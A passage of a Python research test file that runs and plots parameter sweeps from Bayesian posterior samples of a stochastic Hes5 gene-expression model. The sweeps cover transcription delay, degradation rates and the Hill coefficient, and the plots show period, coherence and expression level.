# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill_low_transcription')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = hes5.conduct_all_parameter_sweeps_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories)
for parameter_name in my_parameter_sweep_results:
np.save(os.path.join(os.path.dirname(__file__), 'output','all_parameter_sweeps_hill_low_transcription' + parameter_name + '.npy'),
my_parameter_sweep_results[parameter_name])
def xest_make_all_multiple_parameter_variation(self):
number_of_parameter_points = 20
number_of_trajectories = 200
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = hes5.conduct_all_parameter_sweeps_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories)
for parameter_name in my_parameter_sweep_results:
np.save(os.path.join(os.path.dirname(__file__), 'output','all_parameter_sweeps_' + parameter_name + '.npy'),
my_parameter_sweep_results[parameter_name])
def xest_make_heterozygous_parameter_variation(self):
number_of_parameter_points = 20
number_of_trajectories = 200
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>25000, #cell number
np.logical_and(model_results[:,0]<35000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = hes5.conduct_all_parameter_sweeps_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories)
for parameter_name in my_parameter_sweep_results:
np.save(os.path.join(os.path.dirname(__file__), 'output','all_heterozygous_sweeps_' + parameter_name + '.npy'),
my_parameter_sweep_results[parameter_name])
def xest_make_logarithmic_degradation_rate_sweep(self):
number_of_parameter_points = 20
number_of_trajectories = 200
# number_of_parameter_points = 3
# number_of_trajectories = 2
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_sweep_results = hes5.conduct_parameter_sweep_at_parameters('protein_degradation_rate',
my_posterior_samples,
number_of_sweep_values = number_of_parameter_points,
number_of_traces_per_parameter = number_of_trajectories,
relative = False)
np.save(os.path.join(os.path.dirname(__file__), 'output','logarithmic_degradation_sweep.npy'),
my_sweep_results)
def xest_plot_bifurcation_implementation(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
# sns.set()
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))))
# np.logical_and(model_results[:,1]>0.05,
# model_results[:,3]<0.1))))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,1]<10))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
new_accepted_indices = np.where(my_posterior_samples[:,1]<10)
my_figure = plt.figure( figsize = (6.5, 1.5) )
my_figure.add_subplot(131)
my_degradation_sweep_results = np.load(os.path.join(os.path.dirname(__file__), 'data',
'logarithmic_degradation_sweep.npy'))
new_accepted_indices = np.where(my_posterior_samples[:,1]<10)
# my_indices = np.where(np.logical_and(my_degradation_sweep_results[:,3,4]>0.1,
# my_degradation_sweep_results[:,3,4]<0.2))
# my_degradation_sweep_results = my_degradation_sweep_results[new_accepted_indices]
x_coord = -0.3
y_coord = 1.05
for results_table in my_degradation_sweep_results:
plt.plot(results_table[:,0],
results_table[:,4], color = 'teal', alpha = 0.02, zorder = 0)
plt.axvline( np.log(2)/90, color = 'darkblue' )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().set_rasterization_zorder(1)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Coherence')
plt.ylim(0,1)
plt.gca().text(x_coord, y_coord, 'A', transform=plt.gca().transAxes)
# plt.ylim(0,0.3)
my_figure.add_subplot(132)
hill_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_hill_coefficient.npy'))
# my_indices = np.where(np.logical_and(hill_sweep_results[:,9,4]>0.1,
# hill_sweep_results[:,9,4]<0.2))
# hill_sweep_results = hill_sweep_results[my_indices]
for results_table in hill_sweep_results:
plt.plot(results_table[:,0],
results_table[:,4], color = 'teal', alpha = 0.02, zorder = 0)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().set_rasterization_zorder(1)
plt.xlabel('rel. Hill coefficient')
plt.axvline( 1.0, color = 'darkblue' )
plt.gca().text(x_coord, y_coord, 'B', transform=plt.gca().transAxes)
# plt.ylabel('Coherence')
# plt.ylim(0,0.3)
plt.ylim(0,1)
my_figure.add_subplot(133)
delay_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_time_delay.npy'))
# delay_sweep_results = delay_sweep_results[my_indices]
for results_table in delay_sweep_results:
plt.plot(results_table[:,0],
results_table[:,4], color = 'teal', alpha = 0.02, zorder = 0)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().set_rasterization_zorder(1)
plt.axvline( 1.0, color = 'darkblue')
plt.xlabel('rel. Transcription delay')
plt.gca().text(x_coord, y_coord, 'C', transform=plt.gca().transAxes)
# plt.ylabel('Coherence')
# plt.ylim(0,0.3)
plt.ylim(0,1)
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','bifurcation_illustration.pdf'), dpi = 400)
def xest_plot_logarithmic_degradation_sweep(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
# my_parameter_sweep_results = hes5.conduct_protein_degradation_sweep_at_parameters(my_posterior_samples,
# number_of_parameter_points,
# number_of_trajectories)
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__), 'data',
'logarithmic_degradation_sweep.npy'))
# new_accepted_indices = np.where( my_posterior_samples[:,0] < 10 )
# my_parameter_sweep_results = my_parameter_sweep_results[new_accepted_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
plt.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.005)
plt.axvline( np.log(2)/90 )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Period [min]')
plt.ylim(0,700)
my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
plt.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.005)
plt.axvline( np.log(2)/90 )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Coherence')
plt.ylim(0,1)
my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
plt.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.005)
plt.axvline( np.log(2)/90 )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.ylim(0,15)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Expression/1e4')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','logarithmic_degradation_sweep.pdf'))
def xest_make_logarithmic_relative_parameter_variation(self):
number_of_parameter_points = 20
number_of_trajectories = 200
# number_of_parameter_points = 3
# number_of_trajectories = 2
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = hes5.conduct_all_parameter_sweeps_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories,
relative = True)
for parameter_name in my_parameter_sweep_results:
np.save(os.path.join(os.path.dirname(__file__), 'output','logarithmic_relative_sweeps_' + parameter_name + '.npy'),
my_parameter_sweep_results[parameter_name])
def xest_make_hill_relative_parameter_variation_low_transcription_rate(self):
number_of_parameter_points = 20
number_of_trajectories = 200
# number_of_parameter_points = 3
# number_of_trajectories = 2
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill_low_transcription')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = hes5.conduct_all_parameter_sweeps_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories,
relative = True)
for parameter_name in my_parameter_sweep_results:
np.save(os.path.join(os.path.dirname(__file__), 'output','hill_relative_sweeps_low_transcription' + parameter_name + '.npy'),
my_parameter_sweep_results[parameter_name])
def xest_make_hill_relative_parameter_variation(self):
number_of_parameter_points = 20
number_of_trajectories = 200
# number_of_parameter_points = 3
# number_of_trajectories = 2
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = hes5.conduct_all_parameter_sweeps_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories,
relative = True)
for parameter_name in my_parameter_sweep_results:
np.save(os.path.join(os.path.dirname(__file__), 'output','hill_relative_sweeps_' + parameter_name + '.npy'),
my_parameter_sweep_results[parameter_name])
def xest_plot_hill_relative_parameter_variation(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
# other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
# model_results = model_results[other_accepted_indices]
# my_parameter_sweep_results = hes5.conduct_protein_degradation_sweep_at_parameters(my_posterior_samples,
# number_of_parameter_points,
# number_of_trajectories)
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
reference_indices = dict()
reference_indices['basal_transcription_rate'] = 5
reference_indices['translation_rate'] = 5
reference_indices['repression_threshold'] = 5
reference_indices['time_delay'] = 15
# reference_indices['mRNA_degradation_rate'] = 15
reference_indices['mRNA_degradation_rate'] = 5
reference_indices['protein_degradation_rate'] = 15
reference_indices['hill_coefficient'] = 15
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'hill_relative_sweeps_' + parameter_name + '.npy'))
# my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
my_parameter_sweep_results[:,
reference_indices[parameter_name] -1 ,3] < 400))
my_parameter_sweep_results = my_parameter_sweep_results[increase_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,1.0)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,8)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
print('hello?')
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','hill_all_relative_sweep_' + parameter_name + '.pdf'))
def xest_plot_hill_relative_parameter_variation_transitions(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
model_results = model_results[other_accepted_indices]
# my_parameter_sweep_results = hes5.conduct_protein_degradation_sweep_at_parameters(my_posterior_samples,
# number_of_parameter_points,
# number_of_trajectories)
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'hill_relative_sweeps_' + parameter_name + '.npy'))
# my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,0.4)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,8)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','hill_relative_sweep_' + parameter_name + '.pdf'))
def xest_make_relative_heterozygous_parameter_variation_low_variance(self):
number_of_parameter_points = 20
# number_of_parameter_points = 3
number_of_trajectories = 200
# number_of_trajectories = 2
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.075, #standard deviation
model_results[:,1]>0.025)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = hes5.conduct_all_parameter_sweeps_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories,
relative = True)
for parameter_name in my_parameter_sweep_results:
np.save(os.path.join(os.path.dirname(__file__), 'output','all_relative_sweeps_low_variance_' + parameter_name + '.npy'),
my_parameter_sweep_results[parameter_name])
def xest_plot_hill_sweep_low_variance(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.075, #standard deviation
model_results[:,1]>0.025)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
# other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
# model_results = model_results[other_accepted_indices]
# my_parameter_sweep_results = hes5.conduct_protein_degradation_sweep_at_parameters(my_posterior_samples,
# number_of_parameter_points,
# number_of_trajectories)
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'all_relative_sweeps_low_variance_' + parameter_name + '.npy'))
# my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,0.4)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,8)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','hill_relative_sweep_low_variance_' + parameter_name + '.pdf'))
def xest_make_heterozygous_relative_parameter_variation(self):
number_of_parameter_points = 20
number_of_trajectories = 200
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>25000, #cell number
np.logical_and(model_results[:,0]<35000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = hes5.conduct_all_parameter_sweeps_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories,
relative = True)
for parameter_name in my_parameter_sweep_results:
np.save(os.path.join(os.path.dirname(__file__), 'output','all_heterozygous_relative_sweeps_' + parameter_name + '.npy'),
my_parameter_sweep_results[parameter_name])
def xest_plot_heterozygous_relative_parameter_variation(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>25000, #cell number
np.logical_and(model_results[:,0]<35000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
model_results = model_results[other_accepted_indices]
# my_parameter_sweep_results = hes5.conduct_protein_degradation_sweep_at_parameters(my_posterior_samples,
# number_of_parameter_points,
# number_of_trajectories)
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'all_heterozygous_relative_sweeps_' + parameter_name + '.npy'))
my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,0.4)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
